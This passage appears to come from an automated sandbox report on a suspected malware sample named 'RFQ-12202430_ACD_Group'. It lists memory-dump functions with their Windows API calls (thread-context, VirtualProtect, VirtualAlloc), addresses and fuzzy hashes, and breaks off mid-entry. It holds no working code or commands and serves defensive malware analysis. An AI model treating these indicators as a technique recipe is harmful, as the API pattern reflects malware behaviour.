                                                          Function 066D3E00 Relevance: 1.6, APIs: 1, Instructions: 99threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 066D3EB7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1481046396.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_66d0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          • Opcode ID: 57621e95c24d25187b63e43507be2b94dd3dfea2de796c562c7feea873ea83f5
                                                          • Instruction ID: 9a0941d9765b0e26219cb5eb54cfd38059cac4f81001d906d0519532edf4f0f2
                                                          • Opcode Fuzzy Hash: 57621e95c24d25187b63e43507be2b94dd3dfea2de796c562c7feea873ea83f5
                                                          • Instruction Fuzzy Hash: BE41BAB5D012589FDB10CFAAD884AEEBBF1BB49310F14802AE408B7241C738A945CFA5
                                                          Function 065FDB30 Relevance: 1.6, APIs: 1, Instructions: 98memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 065FDBD4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1480326951.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65f0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: c04a3ff2fe3b423ec16e543ceb99cd45fcbf7fbf8a6d5922efb2cd60a29abe26
                                                          • Instruction ID: da55d439a32bb463de1b03fddec38ae549f8640cac9310252fffdbf9924d20dc
                                                          • Opcode Fuzzy Hash: c04a3ff2fe3b423ec16e543ceb99cd45fcbf7fbf8a6d5922efb2cd60a29abe26
                                                          • Instruction Fuzzy Hash: 8331A8B5D00258DFDB14CFAAD980AEEFBB1BF49310F14942AE814B7210D779A945CF94
                                                          Function 016DFD28 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualProtect.KERNEL32(?,?,?,?), ref: 016DFDCC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1465509854.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_16d0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 085192f4643914bcb64dfa6426a813cc68d66f99333620fc5aeded6a5a4afbce
                                                          • Instruction ID: a6be26b8b8560edf56ff6b64c97e2ec2d8a8fbbc93ff8aae2a02b91eeb613491
                                                          • Opcode Fuzzy Hash: 085192f4643914bcb64dfa6426a813cc68d66f99333620fc5aeded6a5a4afbce
                                                          • Instruction Fuzzy Hash: 9231A7B5D00248EFCF14CFAAD980A9EFBF0BB49310F24942AE815B7210D735A946CF94
                                                          Function 065C9E20 Relevance: 1.6, Strings: 1, Instructions: 346COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1480001863.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65c0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: d
                                                          • API String ID: 0-2564639436
                                                          • Opcode ID: ff0d64bddbea67a262b3d15f5153b37fe9a3ab6c30d12e1eb7e630ac03422989
                                                          • Instruction ID: 065dc9c02779dbf3a858cc95f13a860a2e9c4d2df448ade9cb890dbb660b9b02
                                                          • Opcode Fuzzy Hash: ff0d64bddbea67a262b3d15f5153b37fe9a3ab6c30d12e1eb7e630ac03422989
                                                          • Instruction Fuzzy Hash: 6FD157346006068FCB14DF68C484A6ABBF6FF88360B15C96DE55A9B361DB30FC46CB95
                                                          Function 066D3E08 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 066D3EB7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1481046396.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_66d0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          • Opcode ID: 4e8248e7d82c44338683978b53baefeb2a8bbe1a0d800256df4f380eb3e68ea0
                                                          • Instruction ID: 87b320ada91fff98965c50a03ebebf8544ee85eef644c9b14cf163cc6c3d6fda
                                                          • Opcode Fuzzy Hash: 4e8248e7d82c44338683978b53baefeb2a8bbe1a0d800256df4f380eb3e68ea0
                                                          • Instruction Fuzzy Hash: 0431A8B5D002589FDB14CFAAD884AAEFBF1BB49310F24802AE418B7340D738A945CF94
                                                          Function 068BA760 Relevance: 1.4, Strings: 1, Instructions: 139COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1481376957.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_68a0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: -
                                                          • API String ID: 0-2547889144
                                                          • Opcode ID: 8757efc4cd455eb9b876df44f9cc2abb245f3532e237b62ead91b23d4b35ddc4
                                                          • Instruction ID: 28cfecb689de09499eb6f1ac04ada04e10f9a9783892f31038d129c10ff3386b
                                                          • Opcode Fuzzy Hash: 8757efc4cd455eb9b876df44f9cc2abb245f3532e237b62ead91b23d4b35ddc4
                                                          • Instruction Fuzzy Hash: 9561F274D05228CFEBA8CF64C944BEDBBB2FB49300F0095AAC519A7390DB744A84CF94
                                                          Function 063B0ED0 Relevance: 1.3, APIs: 1, Instructions: 98memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAlloc.KERNEL32(?,?,?,?), ref: 063B0F77
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1478870817.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_63b0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 2689d5b8313ebe5f6804233e4f3dc03f05994a8a7b4a54747d3d083aaeb76683
                                                          • Instruction ID: ebc55864ab6c6850ab39665f5bdeb93195fe680e1d9b53f214e32f1414d3c1a9
                                                          • Opcode Fuzzy Hash: 2689d5b8313ebe5f6804233e4f3dc03f05994a8a7b4a54747d3d083aaeb76683
                                                          • Instruction Fuzzy Hash: 303198B5D01258DFDB14CFA9D880ADEFBB5FB49310F14941AE814B7210D735A945CF98
                                                          Function 063B0ED8 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAlloc.KERNEL32(?,?,?,?), ref: 063B0F77
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1478870817.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_63b0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 09e68805277e0a46156de757be1f28600d582bfdff044d94900895ddedc9a0b1
                                                          • Instruction ID: 9c80d8610a39459bd75081b60b2cd3ecae5b46b1d0f76e5ade51e92d23f63971
                                                          • Opcode Fuzzy Hash: 09e68805277e0a46156de757be1f28600d582bfdff044d94900895ddedc9a0b1
                                                          • Instruction Fuzzy Hash: EF3197B8D01258DFDB14CFA9D880ADEFBF5BB49310F14942AE814B7210D735A945CF98
                                                          Function 064BA3EC Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1479408560.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_64b0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: )
                                                          • API String ID: 0-2427484129
                                                          • Opcode ID: ab8a7d7b7c55b9aa35af303525886d53040cc7805eb9c45c48799bab280a439d
                                                          • Instruction ID: 82b166727d1af09e0685f9e88cc7ccc74bbbcf8a9293e1da8fac5fdcf398b8ed
                                                          • Opcode Fuzzy Hash: ab8a7d7b7c55b9aa35af303525886d53040cc7805eb9c45c48799bab280a439d
                                                          • Instruction Fuzzy Hash: 42F0E770905228CFEB61CF24E8887E9B7B4FB89305F1051E6D089A2291D7744E91CF55
                                                          Function 068A11CF Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1481376957.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_68a0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: b
                                                          • API String ID: 0-1908338681
                                                          • Opcode ID: 7a3ff7a3d4d045614772bb7ec7e64c6fbb9c45a530a72446321605ecd6f8f895
                                                          • Instruction ID: 7d187fe2ffbeb9544fc1bdf6b75669cf07623f03b4b2408ff8dd6637345c5bfc
                                                          • Opcode Fuzzy Hash: 7a3ff7a3d4d045614772bb7ec7e64c6fbb9c45a530a72446321605ecd6f8f895
                                                          • Instruction Fuzzy Hash: 4EF0FE78B112188FDBA4DF54C884AAD77B6FB49308F155494D90AE7784CA345DC0CF91
                                                          Function 068A5343 Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1481376957.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_68a0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: O
                                                          • API String ID: 0-878818188
                                                          • Opcode ID: 214b2093cae76112450351ce829752660c2f6adbd6cdf26ce4598af291235380
                                                          • Instruction ID: cd65fc94f3cfca69825053d433231887d80c91933000c9073b9caa90929c66b2
                                                          • Opcode Fuzzy Hash: 214b2093cae76112450351ce829752660c2f6adbd6cdf26ce4598af291235380
                                                          • Instruction Fuzzy Hash: 82F0DA74A101198FDB60EF14C984AAE77F6FB58344F1494E5994AA7384CE745EC08F90
                                                          Function 064B0AB2 Relevance: 1.3, Strings: 1, Instructions: 21COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1479408560.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_64b0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: U
                                                          • API String ID: 0-3372436214
                                                          • Opcode ID: 988e19a425339dc2527a4e4c77c3a6872ce97b1b3f13a99b4bb1a6b2437a8cfb
                                                          • Instruction ID: 9d95898733afe3aa821b3993b75e842cd0b63b4dc114fef91ff82196a962aeb7
                                                          • Opcode Fuzzy Hash: 988e19a425339dc2527a4e4c77c3a6872ce97b1b3f13a99b4bb1a6b2437a8cfb
                                                          • Instruction Fuzzy Hash: ABF0B2709112289FEBA9DF14DC80BDEB6B1BF49305F1014DA9248B3241C7B19AC1CF12
                                                          Function 064B9318 Relevance: 1.3, Strings: 1, Instructions: 21COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1479408560.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_64b0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: T
                                                          • API String ID: 0-3187964512
                                                          • Opcode ID: bb037d9b8f7ece484231cc6a4ec308d15b4c22324a8ea62dca9d3dc6c4d1cc00
                                                          • Instruction ID: 19b9428a48c01531401313aac5ebe2c637d8132e4bc4f051c8ef09b84e2a7d96
                                                          • Opcode Fuzzy Hash: bb037d9b8f7ece484231cc6a4ec308d15b4c22324a8ea62dca9d3dc6c4d1cc00
                                                          • Instruction Fuzzy Hash: ECE0DF70A04329CFEB608F24D808BEA3765FBC5304F00E196C04A67290D6380E8A4F61
                                                          Function 064BAE97 Relevance: 1.3, Strings: 1, Instructions: 14COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1479408560.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_64b0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: T
                                                          • API String ID: 0-3187964512
                                                          • Opcode ID: 2d67bff05c8f3d68eddc0d8e6dc42b9f7b0be4bcbc99463711b1087af22840cb
                                                          • Instruction ID: 1804e70ca0acbb98f8ce6114f69b48dab40b157ad8d6035c9f95a5c3fafd943b
                                                          • Opcode Fuzzy Hash: 2d67bff05c8f3d68eddc0d8e6dc42b9f7b0be4bcbc99463711b1087af22840cb
                                                          • Instruction Fuzzy Hash: BFD05E71A1032D8FEB20AF34E90CBD937A1FB85208F00D5AAE105BB3A1EA348E454F01
                                                          Function 065CD300 Relevance: .7, Instructions: 677COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1480001863.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65c0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 472261f87b2aae3a30f6c337e677144b9fc5e8d9680d79a3ab09f936ffe7a5d8
                                                          • Instruction ID: 1c72f156a582a3d0c63aa5fccd31cfd78d7156cc8ca85d40494acf938b60522e
                                                          • Opcode Fuzzy Hash: 472261f87b2aae3a30f6c337e677144b9fc5e8d9680d79a3ab09f936ffe7a5d8
                                                          • Instruction Fuzzy Hash: E452F875A102288FDB64CF68C990BADB7F2BF88710F1541E9E509EB351DA309D85CF61
                                                          Function 063D1EA8 Relevance: .6, Instructions: 577COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1478960268.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_63d0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ca738ca737fb6c107c4e98e567f9651a0cf5f822b6eea2ec0eee27898d5e9c1a
                                                          • Instruction ID: 89e18cc3cce9fd7654eb809d99705de61555a59c3af00b84877a0f31e48989ce
                                                          • Opcode Fuzzy Hash: ca738ca737fb6c107c4e98e567f9651a0cf5f822b6eea2ec0eee27898d5e9c1a
                                                          • Instruction Fuzzy Hash: 0F42C475E14209CFEB94DF98E458AAEB7B6FF88301F108015EA16AB350D7345A86CFD0
                                                          Function 065C7851 Relevance: .5, Instructions: 538COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1480001863.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65c0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e99ddad6a02dc753394ef66ae90203ef447d24da250d57be79172223d49e2b78
                                                          • Instruction ID: 72977131334c05391c6625fbd0abefd2f1b2dbe4896a6edf9c8366c482ba065a
                                                          • Opcode Fuzzy Hash: e99ddad6a02dc753394ef66ae90203ef447d24da250d57be79172223d49e2b78
                                                          • Instruction Fuzzy Hash: B3228E75A102099FDB44CFA8D490AADB7B6FF88310F158069E906EB3A1DB75ED41CF90
                                                          Function 065C6C88 Relevance: .5, Instructions: 516COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1480001863.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65c0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 825065ac84f8266c1b9dd12c014356c7538a648e70ada66dff5bb3ef8d08fa68
                                                          • Instruction ID: 28bacbe81bfd14dcdbe6ef7778068e6d99bb1e6a8f98d2b0025a7b814e3b8e38
                                                          • Opcode Fuzzy Hash: 825065ac84f8266c1b9dd12c014356c7538a648e70ada66dff5bb3ef8d08fa68
                                                          • Instruction Fuzzy Hash: C5223B34E102198FDB55CFA4D854AAEBBB2FF48710F148069E911B72A4DB39DE46CF90
                                                          Function 063D2EB8 Relevance: .5, Instructions: 488COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1478960268.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_63d0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b9d88b36171edebb0bd45fb2826284f9a5ff446429e861370d873e4b0a606271
                                                          • Instruction ID: 6e6d5aeaf2212f430a7dfc87b2c787ead39877e888a5819f578e44bad4772e9a
                                                          • Opcode Fuzzy Hash: b9d88b36171edebb0bd45fb2826284f9a5ff446429e861370d873e4b0a606271
                                                          • Instruction Fuzzy Hash: 30221474D11209CFDBA5DFA4E9586ADB7B6FF8A301F208069D506AB244CB395E48CF81
                                                          Function 065CA770 Relevance: .5, Instructions: 488COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1480001863.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65c0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 071e51c061b90c29cfe94dddec3c3af7bf717a5a83a122f779e9d0c8a17ecf9f
                                                          • Instruction ID: 5ecac19cc860911bf4a78d5b7a9fa1ec96822cb1017c11468d070577e9574a25
                                                          • Opcode Fuzzy Hash: 071e51c061b90c29cfe94dddec3c3af7bf717a5a83a122f779e9d0c8a17ecf9f
                                                          • Instruction Fuzzy Hash: 62127E70A106099FDB95DFA5C884AAEBBF6FF88310F14852DE5069B750DB31EC46CB90
                                                          Function 065CC428 Relevance: .4, Instructions: 370COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1480001863.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65c0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 784ffeca5b9f6e95385592b5f2c4aa73b99051050e5967a0b6bbad5ab7887c35
                                                          • Instruction ID: f98608bd0cbd6ef52f6cce7c6577f23c2fc74c856175345eb929a015b0d0f4e8
                                                          • Opcode Fuzzy Hash: 784ffeca5b9f6e95385592b5f2c4aa73b99051050e5967a0b6bbad5ab7887c35
                                                          • Instruction Fuzzy Hash: C9F1D834A10219DFCB48DFA4D998E9DB7B2FF88311F518158E906AB365DB70EC42CB80
                                                          Function 063D29D0 Relevance: .4, Instructions: 362COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1478960268.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_63d0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a1363ceeb324d64ce35651a901e2ef91332d3d35e365cece570241df8ebf019b
                                                          • Instruction ID: f0ff75814350dbb0d5c186454d295f92812cf61037e51d53aefe75322d1f683d
                                                          • Opcode Fuzzy Hash: a1363ceeb324d64ce35651a901e2ef91332d3d35e365cece570241df8ebf019b
                                                          • Instruction Fuzzy Hash: 6CF11734D11219DFCB98DFA4E5886AEBBB6FF49311F204469E616AB350CB345D85CF80
                                                          Function 065C7FD0 Relevance: .3, Instructions: 254COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1480001863.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65c0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e3fbc6eaa869f3b72c156e6080c5e896f2010f7a1cef7b881a964b86fac9982a
                                                          • Instruction ID: 6383c82859df4a47e867ee9f1b3f4c5c129d020a9f4fa447e538b513c2471227
                                                          • Opcode Fuzzy Hash: e3fbc6eaa869f3b72c156e6080c5e896f2010f7a1cef7b881a964b86fac9982a
                                                          • Instruction Fuzzy Hash: 99A12434B006148FDB54DFA8C894AAA7BF6BF89620F1580A9E505DB3A1DB71EC41CB91
                                                          Function 065CC419 Relevance: .2, Instructions: 230COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1480001863.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65c0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 40f3d8e3e629bafeb37cd745a3dcbb8dc97b1bd44091787900e006fb912dbf67
                                                          • Instruction ID: d0f4742be25fbe99f448219e9af0828360ef7a0d7ab2c8e31105a470137eea5d
                                                          • Opcode Fuzzy Hash: 40f3d8e3e629bafeb37cd745a3dcbb8dc97b1bd44091787900e006fb912dbf67
                                                          • Instruction Fuzzy Hash: 54A1F834A10219DFCB44EFA4D898A9DB7B6FF88310F558159E806AB364DB30EC46CF90
                                                          Function 065CCDE1 Relevance: .2, Instructions: 224COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1480001863.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65c0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e77902eefe4842e2549860a879a03b7936001709130b069e13ae754972bd5443
                                                          • Instruction ID: 9447255bb98c37505970ab4d655fac14e3364ddf0714d6aaa2702ae01d53ebc9
                                                          • Opcode Fuzzy Hash: e77902eefe4842e2549860a879a03b7936001709130b069e13ae754972bd5443
                                                          • Instruction Fuzzy Hash: 3C814D74B102188FDB55DBA8D854BADBBF2BF88710F1581A9E50A9B351CB30DC85CF91
                                                          Function 065C33E8 Relevance: .2, Instructions: 221COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1480001863.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65c0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2add6b4b9771d509923f95b2865f7bae8d43991d0b98a303029fd556cd365272
                                                          • Instruction ID: cf3799faa16f27fd91d121eb43b6adfaf403ae73d8ddaa31ddddf97fdeb9ca57
                                                          • Opcode Fuzzy Hash: 2add6b4b9771d509923f95b2865f7bae8d43991d0b98a303029fd556cd365272
                                                          • Instruction Fuzzy Hash: C9818E35B112099FDB45CFA4D994AADBBB6FF88310F148469E912A7390CB35DD41CF90
                                                          Function 065C8D30 Relevance: .2, Instructions: 208COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1480001863.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65c0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 43f4e96d623622e0295a9ec7ed19a7fc2688ed39aa930a34d17de1fae753d70d
                                                          • Instruction ID: 4d9bb5c5b31cf6a44a4ddfdbce2fd9adbd2ce5ba29cee6a8672d1e2f92e59a3a
                                                          • Opcode Fuzzy Hash: 43f4e96d623622e0295a9ec7ed19a7fc2688ed39aa930a34d17de1fae753d70d
                                                          • Instruction Fuzzy Hash: E0811935A00619CFDB54DFA8C484A9EBBF6FF88750B1585A9E8169B360DB30ED41CF90
                                                          Function 064B5A7D Relevance: .2, Instructions: 193COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1479408560.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_64b0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b2df1df15a419aedf40b9b47637179f6158801e6ce2b86e01480756037560994
                                                          • Instruction ID: c5be68d2bcc232ac4384a17133fc08d4296daab2f0e39ae4961f624d4439b958
                                                          • Opcode Fuzzy Hash: b2df1df15a419aedf40b9b47637179f6158801e6ce2b86e01480756037560994
                                                          • Instruction Fuzzy Hash: FC81F674D04218CFDB88DFA9D4886EEFBB6FB89300F10942AD416BB254D7345982CFA0
                                                          Function 065C62A0 Relevance: .2, Instructions: 183COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1480001863.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65c0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 48a16cfbfae7248c5aef04ffb45f333023273e62f49b2bd30d8e56dcf631e342
                                                          • Instruction ID: d69f8b74f8e7871a3d07c5e66d1cbd24c30613da670ca02a2e0f6e34d9721786
                                                          • Opcode Fuzzy Hash: 48a16cfbfae7248c5aef04ffb45f333023273e62f49b2bd30d8e56dcf631e342
                                                          • Instruction Fuzzy Hash: BE519C307103059FDB99AF74C89466EB7E6BF89310B20446DE9429B3A0CF75ED46CB91
                                                          Function 068BBC00 Relevance: .2, Instructions: 177COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1481376957.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_68a0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 595efd91735b9d2d74d60e8241791fc5a7087782f8f5c26f39951b078e961722
                                                          • Instruction ID: 75f8ad86b6aebfa3a161ed792bb434eb88888bf40ce617a786e117bf74d7200e
                                                          • Opcode Fuzzy Hash: 595efd91735b9d2d74d60e8241791fc5a7087782f8f5c26f39951b078e961722
